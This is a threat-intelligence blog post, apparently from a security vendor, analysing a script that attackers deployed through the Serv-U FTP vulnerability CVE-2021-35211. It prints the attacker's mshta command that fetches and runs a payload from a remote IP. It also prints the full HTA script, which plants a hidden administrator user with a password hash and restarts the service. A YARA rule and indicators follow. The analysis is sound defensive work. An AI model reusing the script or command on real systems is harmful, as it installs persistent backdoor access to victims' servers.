Triage analysis of Serv-U FTP user backdoor deployed by CVE-2021-35211
Last night, Microsoft published a blog titled Microsoft discovers threat actor targeting SolarWinds Serv-U software with 0-day exploit:
“MSTIC has observed DEV-0322 targeting entities in the US Defense Industrial Base Sector and software companies .... This activity group is based in China and has been observed using commercial VPN solutions and compromised consumer routers in their attacker infrastructure.”
One of the malicious commands the attacker ran that Microsoft shared is:
<span class="vkIF2 public-DraftStyleDefault-ltr"><span class="">C:</span>WindowsSystem32mshta<span class="_3YD8l">.</span>exe http<span class="_3YD8l">://144[.]34[.]179[.]162/</span>a </span>
We took a very quick look at the file 8785f1049eed4f837e634bf61468e6db921368b61ef5c8b4afa03f44465bd3e0 - served from http://144.34.179[.] 162/a - below.
The server is down now, but was previously serving over port 80 from an Apache web-server set to the Chinese language:
HTTP/1.1 403 Forbidden
Date: Sat, 26 Jun 2021 13:48:06 GMT
Server: Apache/2.4.37 (centos)
Content-Location: index.html.zh-CN
Vary: negotiate,accept-language
TCN: choice
Last-Modified: Fri, 14 Jun 2019 03:37:43 GMT
ETag: "fa6-58b405e7d6fc0;5c336bc7f4d1f"
Accept-Ranges: bytes
Content-Length: 4006
Content-Type: text/html; charset=UTF-8
Content-Language: zh-cn
And the script served is a relatively simple one:
<html>
<head>
<script>
try {
var sFolderPath = "C:\\ProgramData\\RhinoSoft\\Serv-U\\Users\\Global Users";
var fso0 = new ActiveXObject('Scripting.FileSystemObject');
if (!fso0.FolderExists(sFolderPath)) {
fso0.CreateFolder(sFolderPath);
}
var fso;
var data = ">>> VERSION 2 <<<\r\nCUser\r\nUser\r\n0\r\n0\r\n14\r\nCRhinoDateTimeAttr\r\nStatisticsStartTime\r\n1\r\n1\r\nVal\r\n1622098423\r\n<<- StatisticsStartTime\r\nCRhinoUlongLongAttr\r\nRtServerStartTime\r\n1\r\n1\r\nVal\r\n1622075299\r\n<<- RtServerStartTime\r\nCDailyCount\r\nRtDailyCount\r\n1\r\n0\r\n25\r\nCRhinoUintAttr\r\nLastHour\r\n1\r\n1\r\nVal\r\n6\r\n<<- LastHour\r\nCRhinoUlongLongAttr\r\nHourTotal\r\n0\r\n1\r\nVal\r\n0\r\n<<- HourTotal\r\nCRhinoUlongLongAttr\r\nHourTotal\r\n0\r\n1\r\nVal\r\n0\r\n<<- HourTotal\r\nCRhinoUlongLongAttr\r\nHourTotal\r\n0\r\n1\r\nVal\r\n0\r\n<<- HourTotal\r\nCRhinoUlongLongAttr\r\nHourTotal\r\n0\r\n1\r\nVal\r\n0\r\n<<- HourTotal\r\nCRhinoUlongLongAttr\r\nHourTotal\r\n0\r\n1\r\nVal\r\n0\r\n<<- HourTotal\r\nCRhinoUlongLongAttr\r\nHourTotal\r\n0\r\n1\r\nVal\r\n0\r\n<<- HourTotal\r\nCRhinoUlongLongAttr\r\nHourTotal\r\n0\r\n1\r\nVal\r\n0\r\n<<- HourTotal\r\nCRhinoUlongLongAttr\r\nHourTotal\r\n0\r\n1\r\nVal\r\n0\r\n<<- HourTotal\r\nCRhinoUlongLongAttr\r\nHourTotal\r\n0\r\n1\r\nVal\r\n0\r\n<<- HourTotal\r\nCRhinoUlongLongAttr\r\nHourTotal\r\n0\r\n1\r\nVal\r\n0\r\n<<- HourTotal\r\nCRhinoUlongLongAttr\r\nHourTotal\r\n0\r\n1\r\nVal\r\n0\r\n<<- HourTotal\r\nCRhinoUlongLongAttr\r\nHourTotal\r\n0\r\n1\r\nVal\r\n0\r\n<<- HourTotal\r\nCRhinoUlongLongAttr\r\nHourTotal\r\n0\r\n1\r\nVal\r\n0\r\n<<- HourTotal\r\nCRhinoUlongLongAttr\r\nHourTotal\r\n0\r\n1\r\nVal\r\n0\r\n<<- HourTotal\r\nCRhinoUlongLongAttr\r\nHourTotal\r\n0\r\n1\r\nVal\r\n0\r\n<<- HourTotal\r\nCRhinoUlongLongAttr\r\nHourTotal\r\n0\r\n1\r\nVal\r\n0\r\n<<- HourTotal\r\nCRhinoUlongLongAttr\r\nHourTotal\r\n0\r\n1\r\nVal\r\n0\r\n<<- HourTotal\r\nCRhinoUlongLongAttr\r\nHourTotal\r\n0\r\n1\r\nVal\r\n0\r\n<<- HourTotal\r\nCRhinoUlongLongAttr\r\nHourTotal\r\n0\r\n1\r\nVal\r\n0\r\n<<- HourTotal\r\nCRhinoUlongLongAttr\r\nHourTotal\r\n0\r\n1\r\nVal\r\n0\r\n<<- HourTotal\r\nCRhinoUlongLongAttr\r\nHourTotal\r\n0\r\n1\r\nVal\r\n0\r\n<<- HourTotal\r\nCRhinoUlongLongAttr\r\nHourTotal\r\n0\r\n1\r\nVal\r\n0\r\n<<- HourTotal\r\nCRhinoUlongLongAttr\r\nHourTotal\r\n0\r\n1\r\nVal\r\n0\r\n<<- HourTotal\r\nCRhinoUlongLongAttr\r\nHourTotal\r\n0\r\n1\r\nVal\r\n0\r\n<<- HourTotal\r\n<<- RtDailyCount\r\nCRhinoFileNameStringAttr\r\nLoginID\r\n1\r\n1\r\nVal\r\ntory\r\n<<- LoginID\r\nCRhinoDateTimeAttr\r\nPasswordChangedOn\r\n1\r\n1\r\nVal\r\n1622098423\r\n<<- PasswordChangedOn\r\nCRhinoUintAttr\r\nPasswordEncryptMode\r\n1\r\n1\r\nVal\r\n1\r\n<<- PasswordEncryptMode\r\nCRhinoBoolAttr\r\nPasswordUTF8\r\n1\r\n1\r\nVal\r\n1\r\n<<- PasswordUTF8\r\nCUserPasswordAttr\r\nPassword\r\n1\r\n1\r\nVal\r\n00:DDAC510D6348F0D1CA9D169BF3835DCE1EC5A7AE344964F2DA753991D34C015DEB91B64437A9C99A2AE8EC3CD850694F\r\n<<- Password\r\nCDirAccess\r\nDirAccess\r\n0\r\n0\r\n2\r\nCDirFileAccessPathAttr\r\nDir\r\n1\r\n1\r\nVal\r\n\\\\\r\n<<- Dir\r\nCRhinoUintAttr\r\nAccess\r\n1\r\n1\r\nVal\r\n7999\r\n<<- Access\r\n<<- DirAccess\r\nCDirPathAttr\r\nHomeDir\r\n0\r\n1\r\nVal\r\n\\\\\r\n<<- HomeDir\r\nCRhinoUintAttr\r\nAdminType\r\n0\r\n1\r\nVal\r\n2\r\n<<- AdminType\r\nCRhinoBoolAttr\r\nLockInHomeDir\r\n0\r\n1\r\nVal\r\n0\r\n<<- LockInHomeDir\r\nCRhinoUlongLongAttr\r\nQuota\r\n0\r\n1\r\nVal\r\n0\r\n<<- Quota\r\nCRhinoBoolAttr\r\nIncludeRespCodesInMsgFiles\r\n0\r\n1\r\nVal\r\n1\r\n<<- IncludeRespCodesInMsgFiles\r\n<<- User\r\n";
fso=new ActiveXObject("Scripting.FileSystemObject");
var fhandle = fso.createtextfile("C:\\ProgramData\\RhinoSoft\\Serv-U\\Users\\Global Users\\tory.Archive",true);
fhandle.write(data);
fhandle.close()
} catch (e) {}
var sleep = function(time) {
var startTime = new Date().getTime() + parseInt(time, 10);
while(new Date().getTime() < startTime) {}
};s = new ActiveXObject("WScript.Shell");
s.run("\"C:\\Program Files\\RhinoSoft\\Serv-U\\Serv-U-Tray.exe\" -stopengine",0)
sleep(1000)
s.run("\"C:\\Program Files\\RhinoSoft\\Serv-U\\Serv-U.exe\" -startservice",0)
window.close();
</script>
</head>
</html>
The script is very simple- it just creates a new user with the following settings:
- Set user creation date to: Thu May 27 2021 06:53:43 GMT+0000 (Unix timestamp of 1622098423)
- Password Hash: DDAC510D6348F0D1CA9D169BF3835DCE1EC5A7AE344964F2DA753991D34C015DEB91B64437A9C99A2AE8EC3CD850694F
Based on the filename, we believe this user created is called “tory” however we haven’t tested this on a live Serv-U installation.
Yara Rule
rule Malware_ServU_User_Installer {
meta:
description = "Detects malicious script deployed via CVE-2021-35211"
author = "cdoman@cadosecurity.com"
date = "2021-07-14"
hash = "8785f1049eed4f837e634bf61468e6db921368b61ef5c8b4afa03f44465bd3e0"
license = "Apache License 2.0"
strings:
$ = "<script>"
$ = "Scripting.FileSystemObject"
$ = "Global Users"
$ = "RhinoDateTimeAttr"
$ = "Serv-U-Tray.exe"
$ = "WScript.Shell"
condition:
all of them and filesize < 300KB
}
File Hash
8785f1049eed4f837e634bf61468e6db921368b61ef5c8b4afa03f44465bd3e0
Indicators of Compromise (from Microsoft)
98[.]176[.]196[.]89
68[.]235[.]178[.]32
208[.]113[.]35[.]58
144[.]34[.]179[.]162
97[.]77[.]97[.]58
hxxp://144[.]34[.]179[.]162/a
C:\Windows\Temp\Serv-U.bat
C:\Windows\Temp\test\current.dmp
References
- https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211
- https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/
- https://twitter.com/cyb3rops/status/1415204699754672131
About Cado Security
Cado Security specialises in providing tooling and techniques that allow organisations to threat hunt and investigate cloud and container systems.
If you are interested in knowing more, please don’t hesitate to reach out, our pilot program is now open.
More from the blog
View All PostsAnalysis of Initial In The Wild Attacks Exploiting Log4Shell/Log4J/CVE-2021-44228
December 13, 2021Links to Previous Attacks in UAParserJS Compromise
October 23, 2021Analysis of Novel Khonsari Ransomware Deployed by the Log4Shell Vulnerability
December 14, 2021Subscribe to Our Blog
To stay up to date on the latest from Cado Security, subscribe to our blog today.